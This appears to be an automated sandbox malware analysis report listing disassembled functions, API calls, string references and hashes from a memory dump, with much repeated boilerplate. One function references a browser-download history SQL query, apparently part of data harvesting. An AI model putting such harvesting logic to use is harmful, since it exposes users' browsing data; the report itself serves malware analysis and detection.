Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 'o
API String ID: 3986731826-1509574331
Opcode ID: 9242db7766dff460b83c9fc9f1b289d3d86607d82c8126dbc480484cd6498378
Instruction ID: 1c888854aeb230a26734e7a5cb89f202e04295830c758fba463228b58954fd8d
Opcode Fuzzy Hash: 9242db7766dff460b83c9fc9f1b289d3d86607d82c8126dbc480484cd6498378
Instruction Fuzzy Hash: 78416A71800209DFDF55DFA9C880ADEBBF8FF88310F10025AE855EA256E3349945DFA0

Function 0008F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0008F2C7

Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80

std::_Xinvalid_argument.LIBCPMT ref: 0008F2E6
_memmove.LIBCMT ref: 0008F320

Strings

string too long, xrefs: 0008F2E1
invalid string position, xrefs: 0008F2C2

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 196374c444b7728cd25a3b052ca9c569f639f77ccbf974969ca7d341fd70dbd4
Instruction ID: 00ec4420b9361fdd016624bfcfde74c0323d19a6c4922819c7b364bdb067122e
Opcode Fuzzy Hash: 196374c444b7728cd25a3b052ca9c569f639f77ccbf974969ca7d341fd70dbd4
Instruction Fuzzy Hash: 2D115A71700607AFDB04FFBCE885AA9B3A5BB053247544539F596CB682C7B0EA818791

Function 000892A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

lstrlenA.KERNEL32(?), ref: 000894AB
lstrlenA.KERNEL32(?), ref: 000894C6

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Strings

Downloads, xrefs: 000892D1
SELECT target_path, tab_url from downloads, xrefs: 000893B9
Downloads, xrefs: 00089328

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 86680a295c9b1127b47c6b509af5a0e941b8cf0f482ed11a9781b1d746a17e53
Instruction ID: 9264c4198bea074a1fa3a2a71f5099ce2b0d90525f6c07d5f2c1aff4a2887775
Opcode Fuzzy Hash: 86680a295c9b1127b47c6b509af5a0e941b8cf0f482ed11a9781b1d746a17e53
Instruction Fuzzy Hash: 5671B432D00119EFCF01FBA4ED468EEB7B5FF54301B514061F990BB162DB60AE1A9BA1

Function 000A5713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 000A5721
_free.LIBCMT ref: 000A5734

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: 757893ecfc6886bba734157172402b99b3502d633106a42b4f55e55e053d27b7
Instruction ID: 5e01d92e97761b1c75cb47b0040de561cbf3d85fcab3f361a325494ad920d6de
Opcode Fuzzy Hash: 757893ecfc6886bba734157172402b99b3502d633106a42b4f55e55e053d27b7
Instruction Fuzzy Hash: B311E732808D11EBDF317BF8BC05A9E37D4BF463B2F204526F849AA152DE3489809691

Function 0009210E Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,00093794,00000000,00000010), ref: 00092119
lstrcpynA.KERNEL32(002DE918,?,00000000,?), ref: 00092132
lstrlenA.KERNEL32(?), ref: 00092144
wsprintfA.USER32 ref: 00092156

Strings

%s%s, xrefs: 00092150

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 4bad9d7077d2a7908e954373bf9cb986178edd2865d22ad83826d4faa10183ea
Instruction ID: cf759bcea7d58c3616399261573219e1b8548197d891e25e8f1ed358dbb521d3
Opcode Fuzzy Hash: 4bad9d7077d2a7908e954373bf9cb986178edd2865d22ad83826d4faa10183ea
Instruction Fuzzy Hash: 3AF0E9326021157FDF012F59EC4CDAB7FACEF556A57020022F9089A221C7715D2186E1

Function 000A6719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 000A6725

Part of subcall function 000A4954: __getptd_noexit.LIBCMT ref: 000A4957
Part of subcall function 000A4954: __amsg_exit.LIBCMT ref: 000A4964

__getptd.LIBCMT ref: 000A673C
__amsg_exit.LIBCMT ref: 000A674A
__lock.LIBCMT ref: 000A675A
__updatetlocinfoEx_nolock.LIBCMT ref: 000A676E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 052bf8f9bf82955c349f38e319ccf66381a38a474e194ce5ec988e3c0945134b
Instruction ID: 87a69e9d06c411c84ffed107f8f0b548295b328fa982fb72f2b8b62efd16d617
Opcode Fuzzy Hash: 052bf8f9bf82955c349f38e319ccf66381a38a474e194ce5ec988e3c0945134b
Instruction Fuzzy Hash: 0CF0F0329987209BDF61BBE88807BDE72F06F01328F29024AF051A71D3CB691800DA56

Function 00090077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0009009A

Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC0D
Part of subcall function 000AEBF8: __CxxThrowException@8.LIBCMT ref: 000AEC22
Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC33

__EH_prolog3_catch.LIBCMT ref: 00090139
std::_Xinvalid_argument.LIBCPMT ref: 0009014D

Strings

vector<T> too long, xrefs: 00090095, 00090148

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: 2c6a3298aee4a2d4b0a665bb234262c73d12bb74e9d9398ec50aed17019052ba
Instruction ID: 3aa2379afc9a5c2b560fc838693d8a587dfcf87f50372eaf6ae5a1603932fb98
Opcode Fuzzy Hash: 2c6a3298aee4a2d4b0a665bb234262c73d12bb74e9d9398ec50aed17019052ba
Instruction Fuzzy Hash: D731C572E423268FDF14FFACEC89AED77E59B05310F12402BE510EB2A1D6709D40AB51

Function 00093390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 000933AF
StrCmpCA.SHLWAPI(00000000,000B67E0,?), ref: 000933E8

Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581

strtok_s.MSVCRT ref: 00093424

Strings

"x, xrefs: 000933A1, 000933A4

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: "x
API String ID: 348468850-1521615046
Opcode ID: 0f4518bbf92622a5e970985687e5c19bfbb417d8a61a339c341bef905b865c73
Instruction ID: ed52e8f2465089dcf6d9fd677848b567d0d6f7a5daae632dd8eadf0ff0bc7fa5
Opcode Fuzzy Hash: 0f4518bbf92622a5e970985687e5c19bfbb417d8a61a339c341bef905b865c73
Instruction Fuzzy Hash: 9911AC71900504AFDF50DF94C945BDABBF8BF20305F128066E805EB192EB74EB489FA0

Function 00096DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00096DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00096DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096E5C

Strings

ERROR, xrefs: 00096E54

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: d9d21677bad2a4e41b4f4b2749c0d63dcd0ec90fb9f7bebdfa7455b0d9c160c3
Instruction ID: 5b9f31117403534b5eba513839a27642449d62b9f7149a1ec339f705d153620f
Opcode Fuzzy Hash: d9d21677bad2a4e41b4f4b2749c0d63dcd0ec90fb9f7bebdfa7455b0d9c160c3
Instruction Fuzzy Hash: D6110771D0150AAFCF80FFB4D946AEDBBB0BF04314B514131E824A7562E735EA65ABC1

Function 0008F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0008F282

Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC0D
Part of subcall function 000AEBF8: __CxxThrowException@8.LIBCMT ref: 000AEC22
Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC33

std::_Xinvalid_argument.LIBCPMT ref: 0008F28D

Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80

Strings

string too long, xrefs: 0008F27D
invalid string position, xrefs: 0008F288

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
